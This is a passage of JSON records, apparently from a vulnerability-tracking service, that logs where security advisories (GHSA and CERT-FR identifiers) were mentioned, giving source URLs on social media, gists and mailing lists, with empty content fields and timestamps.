"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-006", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lhtdf663cm2z", "content": "", "creation_timestamp": "2025-02-10T14:15:15.127115Z"}, {"uuid": "8716dac3-4651-4f2d-835c-97ae268a66e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9gfv-q6wj-fr3c", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113980106501007141", "content": "", "creation_timestamp": "2025-02-10T14:40:05.574727Z"}, {"uuid": "1e3ff95f-11ed-43fc-a4c0-02b29452b9cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wvr3-c9x3-9mff", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113980358279860347", "content": "", "creation_timestamp": "2025-02-10T15:44:05.129223Z"}, {"uuid": "4db85a40-708b-4aad-ac67-2a8a6cc292a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8r8p-7mgp-vf56", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113980382711327196", "content": "", "creation_timestamp": "2025-02-10T15:50:17.663169Z"}, {"uuid": "ebf48a6b-79b4-4358-853c-fed40ce2587a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mg4q-ghvh-cm2j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113980382727153222", "content": "", "creation_timestamp": "2025-02-10T15:50:17.893534Z"}, {"uuid": "632ed034-9af3-4698-b19b-583fe4f83978", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8r8p-7mgp-vf56", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113980543498444388", "content": "", "creation_timestamp": "2025-02-10T16:31:11.209292Z"}, {"uuid": "7c223343-3d21-44c4-b038-5c8c5bbc4c02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37wc-h8xc-5hc4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113980818586300320", "content": "", "creation_timestamp": "2025-02-10T17:41:08.508139Z"}, {"uuid": "61f73bb7-a8fb-4e17-8fe8-d4c81c9c4bc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hcrc-79hj-m3qh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113981192096573813", "content": "", "creation_timestamp": "2025-02-10T19:16:08.327891Z"}, {"uuid": "7595c7fe-7b3b-4583-9ed6-2a5826a2e2ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hcrc-79hj-m3qh", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113981200022323322", "content": "", "creation_timestamp": "2025-02-10T19:18:09.742522Z"}, {"uuid": "4c4a735d-ba50-409c-af74-7a973f4fc34c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113981856178857798", "content": "", "creation_timestamp": "2025-02-10T22:05:01.017835Z"}, {"uuid": "44bd9a05-ba10-4c46-86cf-fccc09660286", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113981856193211167", "content": "", "creation_timestamp": "2025-02-10T22:05:01.214046Z"}, {"uuid": "cf7a841f-7292-4696-9b4d-90518f1f073e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pw7m-p9q7-357p", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113981896093771933", "content": "", "creation_timestamp": "2025-02-10T22:15:09.990914Z"}, {"uuid": "48ba5270-876e-410b-acfc-90c34ba67d41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2569-6r9f-j7jv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113981896109702786", "content": "", "creation_timestamp": "2025-02-10T22:15:10.345718Z"}, {"uuid": "40c4328e-04bc-401d-81c6-9c7beb5bfd09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f82v-jwr5-mffw", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3lky3ebz67f2b", "content": "", "creation_timestamp": "2025-03-22T15:50:29.064887Z"}, {"uuid": "5f57adb7-5f2a-4db8-8f16-0bd3b3ae27ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f82v-jwr5-mffw", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/114212060314893349", "content": "", "creation_timestamp": "2025-03-23T13:48:57.273559Z"}, {"uuid": "bbdb1220-71db-4ff6-9a68-ecfe0c14a39b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fq29-72jg-5hrj", "type": "seen", "source": "https://daniel.haxx.se/blog/2025/02/11/disabling-cert-checks-we-have-not-learned-much/", "content": "", "creation_timestamp": "2025-02-11T14:00:07.000000Z"}, {"uuid": "4539b7fb-1b83-46f9-a231-8693dc3072bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9mgx-552f-59p6", "type": "seen", "source": "https://daniel.haxx.se/blog/2025/02/11/disabling-cert-checks-we-have-not-learned-much/", "content": "", "creation_timestamp": "2025-02-11T14:00:07.000000Z"}, {"uuid": "1614c8d4-3a56-43df-9efa-745cec455845", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-crg3-fjm2-xvpq", "type": "seen", "source": "https://daniel.haxx.se/blog/2025/02/11/disabling-cert-checks-we-have-not-learned-much/", "content": "", "creation_timestamp": "2025-02-11T14:00:07.000000Z"}, {"uuid": "ffc3cc5c-c440-4d2b-9914-5ce8f7486828", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-009", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lji4vkdfmb23", "content": "", "creation_timestamp": "2025-03-03T14:10:14.374931Z"}, {"uuid": "2676622f-a95f-48d1-98fc-60f829179e98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-009", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114098897766456947", "content": "", "creation_timestamp": "2025-03-03T14:10:14.810358Z"}, {"uuid": "3782613f-4426-4224-b2af-0b85eb4cabee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://bsky.app/profile/newsyc250.bsky.social/post/3lhwejljvrh2a", "content": "", "creation_timestamp": "2025-02-11T19:13:36.142339Z"}, {"uuid": "865d2c2d-6a02-42bb-a0e9-2967df0dff99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://bsky.app/profile/newsyc200.bsky.social/post/3lhwhuuyvpa2l", "content": "", "creation_timestamp": "2025-02-11T20:13:36.231988Z"}, {"uuid": "a24f2cb6-295f-4152-94de-e9b81128ca1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52rf-25hq-5m33", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113987467563948370", "content": "", "creation_timestamp": "2025-02-11T21:52:03.986936Z"}, {"uuid": "d94283d6-44ba-4520-abbc-a836974becdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2q43-grv2-jxwh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113987706268933005", "content": "", "creation_timestamp": "2025-02-11T22:52:46.164719Z"}, {"uuid": "956f52bd-ff65-47c0-894f-f649e19646c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F3GW-9WW9-JMC3", "type": "seen", "source": "https://t.me/brutsecurity/1837", "content": "", "creation_timestamp": "2026-07-09T03:00:08.503243Z"}, {"uuid": "5d25f2c8-2185-4900-b065-1f5c15ad15d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wfmf-8626-q3r3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114099556793062950", "content": "", "creation_timestamp": "2025-03-03T16:57:49.761044Z"}, {"uuid": "6b02c423-f13d-43e0-999e-8f27e562b891", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-97cv-f342-v2jc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114099625284227660", "content": "", "creation_timestamp": "2025-03-03T17:15:15.070451Z"}, {"uuid": "72adf8fa-466a-4d53-8393-697227606e51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r38m-44fw-h886", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114099772162398875", "content": "", "creation_timestamp": "2025-03-03T17:52:36.210111Z"}, {"uuid": "fd544b91-6364-4559-9899-40a2ae34dc90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q92j-grw3-h492", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114151081494165899", "content": "", "creation_timestamp": "2025-03-12T19:21:15.285505Z"}, {"uuid": "623b5cde-cec5-47a7-bbd8-a50e3ba0f601", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f82v-jwr5-mffw", "type": "seen", "source": "https://gist.github.com/ricardojba/86eaf1c5da9467c9670aeaf5913f9145", "content": "", "creation_timestamp": "2025-03-25T18:27:01.000000Z"}, {"uuid": "4e120d85-6052-4c26-a7b6-a820b10aff27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67mh-4wv8-2f99", "type": "seen", "source": "https://bsky.app/profile/ppoi.bsky.social/post/3liiyhsfvy223", "content": "", "creation_timestamp": "2025-02-19T04:58:26.746995Z"}, {"uuid": "42e57a3f-fb5e-4b26-8e26-f76a9c66c080", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w32m-9786-jp63", "type": "seen", "source": "https://gist.github.com/ruokun-niu/25de36e2d9507c94536ff4058d807551", "content": "", "creation_timestamp": "2025-02-25T19:44:55.000000Z"}, {"uuid": "c081e4be-7e52-4ba8-a206-160d1ffc76a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7229-Q9PV-J6P4", "type": "seen", "source": "https://t.me/brutsecurity/2267", "content": "", "creation_timestamp": "2026-07-09T03:00:06.529781Z"}, {"uuid": "8f770ecf-3a22-408e-9b69-7b59d3ebf380", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w2rr-38wv-8rrp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114196299759939165", "content": "", "creation_timestamp": "2025-03-20T19:00:50.237668Z"}, {"uuid": "52d9969e-9b02-46c0-9d1e-d7eba047fc29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-010", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114138602965774995", "content": "", "creation_timestamp": "2025-03-10T14:27:47.714399Z"}, {"uuid": "780f9d7e-a5b4-4acf-91a2-d449643f3a59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-010", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3ljzr5f5p4r2n", "content": "", "creation_timestamp": "2025-03-10T14:27:47.888996Z"}, {"uuid": "7a90f1fd-c6f8-47cf-a55f-b0362f501f78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W7XJ-8FX7-WFCH", "type": "seen", "source": "https://t.me/brutsecurity/2387", "content": "", "creation_timestamp": "2026-07-09T03:00:06.161466Z"}, {"uuid": "cb50d303-e6ff-4615-bdfd-9660ef5752cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x3m8-899r-f7c3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114162071842369847", "content": "", "creation_timestamp": "2025-03-14T17:56:13.684329Z"}, {"uuid": "6c745a2b-3592-494d-8a90-4dee51b0cefe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HF5-MC28-XMCV", "type": "seen", "source": "https://t.me/brutsecurity/2451", "content": "", "creation_timestamp": "2026-07-09T03:00:05.927559Z"}, {"uuid": "285c1a71-9627-4ae1-b784-5b00404f0f27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/41bf4d93e6443323e6883db1660999d0", "content": "", "creation_timestamp": "2025-07-16T05:39:42.000000Z"}, {"uuid": "9b0d2af3-2832-414c-a03d-04acbc55d6cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/30f02cbaedc5abf4a02685db2603b3ee", "content": "", "creation_timestamp": "2025-07-16T09:40:04.000000Z"}, {"uuid": "ef4b726c-67a9-4608-963f-70d267bc3d1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/30f02cbaedc5abf4a02685db2603b3ee", "content": "", "creation_timestamp": "2025-07-16T09:40:04.000000Z"}, {"uuid": "c6652d95-982c-4561-a621-6f61e1ba493e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/f0f0644035388c4aef8604733b503de6", "content": "", "creation_timestamp": "2025-07-16T11:38:23.000000Z"}, {"uuid": "d121b6c4-8ad2-4fb6-94e2-b2debe5ff27e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wg47-6jq2-q2hh", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114275934621714005", "content": "", "creation_timestamp": "2025-04-03T20:33:02.162190Z"}, {"uuid": "224e7626-4e6e-4507-aaaf-d0038603f501", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wg47-6jq2-q2hh", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114275934621714005", "content": "", "creation_timestamp": "2025-04-03T20:33:02.163998Z"}, {"uuid": "62df1543-e947-42c5-b010-4b785934afe0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/6b188f32f9a4f14d0c91b7a5e40b8750", "content": "", "creation_timestamp": "2025-07-16T05:46:19.000000Z"}, {"uuid": "3bf6b317-720c-4012-9ba8-2b8a3dcb2fe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/6b188f32f9a4f14d0c91b7a5e40b8750", "content": "", "creation_timestamp": "2025-07-16T05:46:19.000000Z"}, {"uuid": "e99fa2b2-bc59-4121-864c-fbdc5a40be1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/6b188f32f9a4f14d0c91b7a5e40b8750", "content": "", "creation_timestamp": "2025-07-16T05:46:19.000000Z"}, {"uuid": "0bc3b2d9-4aeb-4a2d-b861-983603ab14b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/73e30ba01b2bab580ce5322378f7dd94", "content": "", "creation_timestamp": "2025-07-16T05:28:57.000000Z"}, {"uuid": "431314c9-f3b1-4ca5-b773-00265755e2db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/73e30ba01b2bab580ce5322378f7dd94", "content": "", "creation_timestamp": "2025-07-16T05:28:57.000000Z"}, {"uuid": "6fc1becd-da9f-4afe-a1cf-1b4a428e7e22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/86ea8c843cab7db16c46770d57b0192d", "content": "", "creation_timestamp": "2025-07-16T09:38:57.000000Z"}, {"uuid": "531690f9-7c23-4318-bb73-4b2b1a01d349", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p7rr-28xf-3m5w", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114547193543047342", "content": "", "creation_timestamp": "2025-05-21T18:17:44.603316Z"}, {"uuid": "af14ddf1-c5d3-4935-bcc4-2ed25926e664", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "f4ade63a-c39d-4882-b703-0da31b4968c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jrm8-xgf3-fwqr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113952958359120211", "content": "", "creation_timestamp": "2025-02-05T19:35:55.223604Z"}, {"uuid": "5d5f2248-5456-44e0-a63f-b74b43f6ae8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cxqq-w3x5-7ph3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113952958359120211", "content": "", "creation_timestamp": "2025-02-05T19:35:55.273948Z"}, {"uuid": "e51a6602-bac0-43a8-a671-9f58c16191a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-013", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114257510601340238", "content": "", "creation_timestamp": "2025-03-31T14:27:35.432375Z"}, {"uuid": "dad32d4b-36a0-48e9-b0d8-e3c69ff3ca8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcrp-x7w3-ffmg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113913835972390585", "content": "", "creation_timestamp": "2025-01-29T21:46:35.058181Z"}, {"uuid": "bdb24516-dd0c-4990-be4e-98eab2c501f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-013", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114257510601340238", "content": "", "creation_timestamp": "2025-03-31T14:27:35.440821Z"}, {"uuid": "c5d200e2-ee39-40f1-aaba-c8dfb22d1514", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vj7w-3m8c-6vpx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113964685545907240", "content": "", "creation_timestamp": "2025-02-07T21:18:17.955358Z"}, {"uuid": "6fe31824-c881-47be-9fa1-0ecacf65d8af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5cch-jr52-qffh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113964969301987255", "content": "", "creation_timestamp": "2025-02-07T22:30:27.676978Z"}, {"uuid": "c3b87ab8-b4d0-42fa-bf92-37a9631b34c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5w3c-wph9-hq92", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113964969320102674", "content": "", "creation_timestamp": "2025-02-07T22:30:28.005358Z"}, {"uuid": "216b81a7-2a0b-4d85-a26d-f7f7da1cbd86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9gfv-q6wj-fr3c", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113965018530943298", "content": "", "creation_timestamp": "2025-02-07T22:42:58.812785Z"}, {"uuid": "dbeb9ed7-3254-4f8e-a084-224812d203e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v8xr-gpvj-cx9g", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lkea5pvarj26", "content": "", "creation_timestamp": "2025-03-14T18:23:04.200529Z"}, {"uuid": "5f9e1477-60a3-4c6e-845e-1e6acd2d9633", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://bsky.app/profile/hnbest.bsky.social/post/3lhv6waxqlt2u", "content": "", "creation_timestamp": "2025-02-11T08:00:39.165072Z"}, {"uuid": "b0b81955-ef0a-4b6f-aa68-39d193db467c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://bsky.app/profile/hnbest.bsky.social/post/3lhv6xp6rlj2r", "content": "", "creation_timestamp": "2025-02-11T08:01:27.380763Z"}, {"uuid": "942325fe-04c3-48c9-83e9-a6c1296b6e56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-006", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lhvcaimp2l2o", "content": "", "creation_timestamp": "2025-02-11T09:00:04.928401Z"}, {"uuid": "4b7be2eb-6fce-4181-8064-fb58e5d3c611", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fq29-72jg-5hrj", "type": "seen", "source": "https://mastodon.social/users/bagder/statuses/113984578741306684", "content": "", "creation_timestamp": "2025-02-11T09:37:26.877261Z"}, {"uuid": "162c6f55-36ae-4481-9e37-25b713a4e3f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fq29-72jg-5hrj", "type": "seen", "source": "https://bsky.app/profile/bagder.mastodon.social.ap.brid.gy/post/3lhvediyahgi2", "content": "", "creation_timestamp": "2025-02-11T09:38:12.331053Z"}, {"uuid": "2782ef3b-4867-4edf-9d5c-2aa277cbf729", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9mgx-552f-59p6", "type": "seen", "source": "https://mastodon.social/users/bagder/statuses/113984640008586392", "content": "", "creation_timestamp": "2025-02-11T09:53:02.052915Z"}, {"uuid": "1d36c5f1-cf65-4636-8ef4-d8eab5ba2c50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9mgx-552f-59p6", "type": "seen", "source": "https://bsky.app/profile/bagder.mastodon.social.ap.brid.gy/post/3lhvf7dyo2642", "content": "", "creation_timestamp": "2025-02-11T10:01:07.306688Z"}, {"uuid": "dde80843-41a3-4684-8936-1754b171795a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7xf-f3wq-rvr9", "type": "seen", "source": "https://github.com/advisories/GHSA-f7xf-f3wq-rvr9", "content": "", "creation_timestamp": "2025-02-11T10:49:39.591000Z"}, {"uuid": "2b0211eb-d4ed-4e48-ae5b-f65729ee7bb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w98m-j6hq-cwjm", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113986005569037253", "content": "", "creation_timestamp": "2025-02-11T15:40:15.599754Z"}, {"uuid": "56b29797-2c23-4fe2-81e2-9c09103c8c25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 